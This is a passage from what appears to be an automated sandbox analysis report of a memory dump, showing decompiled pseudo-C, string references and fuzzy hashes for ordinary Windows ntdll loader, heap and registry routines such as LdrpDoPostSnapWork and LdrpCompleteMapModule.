Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0190932A
LdrpFindDllActivationContext, xrefs: 01909331, 0190935D
Querying the active activation context failed with status 0x%08lx, xrefs: 01909357
minkernel\ntdll\ldrsnap.c, xrefs: 0190933B, 01909367

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: e73babf555167d99bf2464a008c1d75f28451e3f64a36fc6f32ecc8056658e2f
Instruction ID: 57f4519c4c79b1ce37f524deda989cc4fffb860143210e900c7f3b5bd96e751e
Opcode Fuzzy Hash: e73babf555167d99bf2464a008c1d75f28451e3f64a36fc6f32ecc8056658e2f
Instruction Fuzzy Hash: 33411E31A803199FEB36AA5CC888A397764AB43F58F06416DE508D7192E770EF80CF81

Uniqueness

Uniqueness Score: -1.00%

Function 019549A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

This is located in the %s field of the heap header., xrefs: 01954AD6
HEAP[%wZ]: , xrefs: 01954A3D, 01954AB7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01954A61
HEAP: , xrefs: 01954A4A, 01954A5D, 01954A5F, 01954AC4

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: cdf15d2258a8a554012a5f62b877affa974cda802c0ac08afd28e4f65cf640d3
Instruction ID: 7634f567299893e3034d005b7b6c428e1a16696b42b82a6bedd463509256956f
Opcode Fuzzy Hash: cdf15d2258a8a554012a5f62b877affa974cda802c0ac08afd28e4f65cf640d3
Instruction Fuzzy Hash: 1A312471200500EFD7E1DB9DC889F67B7A8EF01B21F184469F909EB251F670EA80CB69

Uniqueness

Uniqueness Score: -1.00%

Function 018A8794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E018A8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E018A934A() != 0) {
								_t159 = E0191A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1985780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01915510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1985780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E018A849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E018A8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E018A8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1985c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1985c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E018B2280(_t92, 0x19886cc);
															_t94 = E01969DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E018C61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1985c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E018A8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1985c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1985c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E018DF380(_t136, 0x1871184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E018B2280(_t108, 0x19886cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E018C61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01969D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E018AFFB0(_t118, _t156, 0x19886cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E018D9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x018a8799
0x018a879d
0x018a87a1
0x018a87a3
0x018a87a8
0x018a87c3
0x018a87c3
0x018a87c8
0x018a87d1
0x018a87d4
0x018a87d8
0x018a87e5
0x018a87ec
0x018f9bfe
0x018f9c00
0x018f9c02
0x018f9c08
0x018f9c0d
0x018f9c0f
0x018f9c14
0x018f9c2d
0x018f9c32
0x018f9c37
0x018f9c3a
0x018f9c3c
0x018f9c42
0x018f9c42
0x018f9c3c
0x018f9c02
0x018a87da
0x018a87df
0x018a87e3
0x00000000
0x00000000
0x018a87e3
0x018a87f2
0x00000000
0x018a87fb
0x018a87fd
0x018a87fe
0x018a880e
0x018a880f
0x018a8810
0x018a8814
0x018a881a
0x018a881c
0x018a881f
0x018a8821
0x018a8822
0x018a8824
0x018a8826
0x018a882c
0x018a882e
0x018f9c48
0x018f9c48
0x018a8834
0x018a8834
0x018a8837
0x00000000
0x00000000
0x018a8837
0x018a882e
0x018a883d
0x018a8840
0x018a8843
0x018a8846
0x018a8849
0x018a884c
0x018a884e
0x018a8850
0x018a8852
0x018a8854
0x018a8857
0x018a88b4
0x018a88b6
0x018a88b6
0x018a8859
0x018a8859
0x018a8859
0x018a8861
0x018a8866
0x018a886a
0x018a893d
0x018a8941
0x00000000
0x018a8947
0x018a8947
0x018a894a
0x018a894c
0x00000000
0x018a8952
0x018a8955
0x018a895a
0x018a895d
0x018a895d
0x018a895f
0x018a8961
0x018a8961
0x018a8968
0x00000000
0x00000000
0x018a896a
0x018a896b
0x018a896e
0x00000000
0x018a8970
0x018a8970
0x018a8970
0x018a8970
0x018a8972
0x018a8972
0x018a8974
0x00000000
0x018a897a
0x018a897a
0x018a897d
0x00000000
0x018a8983
0x018f9c65
0x018f9c6d
0x018f9c72
0x018f9c75
0x018f9c75
0x018f9c82
0x018f9c86
0x018f9c87
0x018f9c88
0x018f9c89
0x018f9c8c
0x018f9c90
0x018f9c95
0x018f9c97
0x018f9ca0
0x018f9ca3
0x018f9ca9
0x018f9ca9
0x00000000
0x018f9ca9
0x018f9ca3
0x00000000
0x018f9c97
0x018a897d
0x00000000
0x018a8974
0x018a8988
0x018a8992
0x018a8996
0x00000000
0x018a8996
0x018a894c
0x00000000
0x018a8870
0x018a887b
0x018a887d
0x018a887f
0x018a8881
0x018a8884
0x018a8884
0x018a8886
0x018a8889
0x018a888c
0x018a888e
0x018a8891
0x018a8891
0x018a8898
0x00000000
0x00000000
0x018a889a
0x018a889b
0x018a889e
0x00000000
0x00000000
0x018a88a0
0x018a88a8
0x018a88b0
0x018a88b2
0x018a88d3
0x018a88d5
0x00000000
0x018a88d7
0x018a88db
0x018a88dc
0x018a88e0
0x018a88e8
0x018a88ee
0x018a88f0
0x018a88f3
0x018a88fc
0x018a8901
0x018a8906
0x018a890c
0x018a890c
0x018a890f
0x018a8916
0x018a8917
0x018a8918
0x018a8919
0x018a891a
0x018a891f
0x018a8921
0x018f9c52
0x018f9c55
0x018f9c5b
0x018f9cac
0x018f9cc0
0x018f9cc0
0x018f9c55
0x018a8927
0x018a8927
0x018a892f
0x018a8933
0x00000000
0x018a88f5
0x018a88f5
0x00000000
0x018a88f7
0x018a88f7
0x018a88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x018a88fa
0x018a88f5
0x018a88f3
0x00000000
0x018a88d5
0x00000000
0x018a88b2
0x018a88c9
0x00000000
0x018a88c9
0x018a887f
0x018a886a
0x018a8857
0x018a8852
0x018a88bf
0x018a88bf
0x018a87aa
0x018a87ad
0x018a87ae
0x018a87b4
0x018a87b5
0x018a87b6
0x018a87b8
0x018a87bd
0x018a87c1
0x018a87f4
0x018a87fa
0x00000000
0x00000000
0x00000000
0x018a87c1
0x00000000

Strings

LdrpDoPostSnapWork, xrefs: 018F9C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 018F9C18
minkernel\ntdll\ldrsnap.c, xrefs: 018F9C28

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: c8aba4aedb160d1413e1d0a3ac3a6b7f6e109412b04a63a4325e1ae15fcf22ac
Instruction ID: 124877fc518c5a2367806108fa23fa2b66f981099694130e6f0b0af8eaa95717
Opcode Fuzzy Hash: c8aba4aedb160d1413e1d0a3ac3a6b7f6e109412b04a63a4325e1ae15fcf22ac
Instruction Fuzzy Hash: 3291F671A0021A9FFB18DF5DD480A7A77B5FF45315B954069EA05DB241DB30EF01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 018A7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E018A7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E018ACEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0189C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1985780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01915510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1985780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E018B7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E018B7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01917016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E018B7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E018B7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01917016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E018CA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0189B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x018a7e4c
0x018a7e50
0x018a7e55
0x018a7e58
0x018a7e5d
0x018a7e71
0x018a7f33
0x018a7e77
0x018a7e77
0x018a7e79
0x018a7e79
0x018a7e7e
0x018a7f45
0x018f9848
0x00000000
0x018f9848
0x018a7f4e
0x018a7f53
0x018a7f5a
0x00000000
0x00000000
0x018f985a
0x018f9862
0x018f9866
0x00000000
0x018f986c
0x00000000
0x018f986c
0x018a7e84
0x018a7e84
0x018a7e8d
0x018f9871
0x018a7eb8
0x018a7ec0
0x018a7ec0
0x018a7e9a
0x018f987e
0x00000000
0x00000000
0x018f9884
0x018f988b
0x018f98a7
0x018f98ac
0x018f98b1
0x018f98b6
0x018f98b8
0x018f98b8
0x018f98b9
0x00000000
0x018f98b9
0x018a7ea0
0x018a7ea7
0x00000000
0x00000000
0x018a7eac
0x018a7eb1
0x018a7ec6
0x018a7ed0
0x018f98cc
0x018a7ed6
0x018a7ed6
0x018a7ed6
0x018a7ede
0x018a7ee3
0x018f98e3
0x018f98f0
0x018f9902
0x018f98f2
0x018f98fb
0x018f98fb
0x018f9907
0x018f991d
0x018f991d
0x018f9907
0x018f98e3
0x018a7ef0
0x018a7f14
0x018a7f14
0x018a7f1e
0x018f9946
0x018a7f24
0x018a7f24
0x018a7f24
0x018a7f2c
0x018f996a
0x018f9975
0x018f9975
0x018f997e
0x018f9993
0x018f9993
0x018f997e
0x00000000
0x018a7ef2
0x018a7efc
0x018a7f0a
0x018a7f0e
0x018f9933
0x00000000
0x018f9933
0x00000000
0x018a7f0e
0x00000000
0x00000000
0x00000000
0x018a7eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 018F98A2
LdrpCompleteMapModule, xrefs: 018F9898
Could not validate the crypto signature for DLL %wZ, xrefs: 018F9891

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 24f78c72c22802fab7ad4048116af6c3defb86b5fafef187ac72d27926b14b3d
Instruction ID: 34b6712a80e575cbdccda5a8111dacd282351554daed2dfe6d83abdae06b8030
Opcode Fuzzy Hash: 24f78c72c22802fab7ad4048116af6c3defb86b5fafef187ac72d27926b14b3d
Instruction Fuzzy Hash: E851E031A0078A9BFB21CB6CC984B6A7BE4AB41B18F840599EB51DB3D1D735EF00C791

Uniqueness

Uniqueness Score: -1.00%

Function 0189E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0189E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0189F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E018D95D0();
						}
						if(_t78 != 0) {
							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E018DFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E018DBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E018D9600();
					if(_t97 < 0) {
						goto L6;
					}
					E018DBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0189F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E018DBB40(_t83, _t102 + 0x24, _t78);
								if(L018A43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E018DBB40(_t84, _t102 + 0x24, _t94);
									if(L018A43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0189e620
0x0189e628
0x0189e62f
0x0189e631
0x0189e635
0x0189e637
0x0189e63e
0x018f5503
0x018f5503
0x0189e64c
0x0189e64c
0x0189e651
0x00000000
0x00000000
0x0189e661
0x0189e665
0x018f542a
0x0189e715
0x0189e71a
0x0189e71c
0x0189e720
0x0189e720
0x0189e727
0x0189e736
0x0189e736
0x0189e743
0x0189e743
0x0189e673
0x0189e678
0x0189e67d
0x0189e682
0x0189e685
0x0189e692
0x0189e69b
0x0189e6a3
0x0189e6ad
0x0189e6b1
0x0189e6b2
0x0189e6bb
0x0189e6bf
0x0189e6c0
0x0189e6c8
0x0189e6cc
0x0189e6d5
0x0189e6d9
0x00000000
0x00000000
0x0189e6e5
0x0189e6ea
0x0189e6f9
0x0189e70b
0x0189e70f
0x018f5439
0x018f545e
0x018f545e
0x00000000
0x018f545e
0x018f543b
0x018f543e
0x018f5440
0x018f5445
0x018f5472
0x018f5475
0x018f548d
0x018f5493
0x018f54a9
0x00000000
0x00000000
0x018f54ab
0x018f54b4
0x018f54bc
0x018f54c8
0x018f54de
0x018f54fb
0x018f54e0
0x018f54e6
0x018f54eb
0x018f54eb
0x018f54de
0x00000000
0x018f54bc
0x018f5477
0x018f547a
0x018f5480
0x018f5483
0x018f5486
0x018f548b
0x00000000
0x00000000
0x00000000
0x018f548b
0x00000000
0x00000000
0x00000000
0x00000000
0x018f5447
0x018f5447
0x018f5447
0x018f5447
0x018f544e
0x00000000
0x00000000
0x018f5450
0x018f5452
0x018f5455
0x018f545a
0x00000000
0x00000000
0x00000000
0x018f545c
0x018f546a
0x018f546d
0x018f546f
0x00000000
0x018f546f
0x0189e70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0189E68C
@, xrefs: 0189E6C0
InstallLanguageFallback, xrefs: 0189E6DB

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: d92726197eb7ef754792709929e190440e13afac2e6c3d4c4918c6a43c167342
Instruction ID: 9411817b6550f3184ed7d93474d7a0333b8afc6b411e900f1cabd68c891a1fd0
Opcode Fuzzy Hash: d92726197eb7ef754792709929e190440e13afac2e6c3d4c4918c6a43c167342
Instruction Fuzzy Hash: 0B517FB26083469BDB14DF68C480A6BB7E8BF98715F45092EFA85D7240F734DB04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0195E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0195E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0195BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0195BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0195AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E018D9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0195A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0195A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
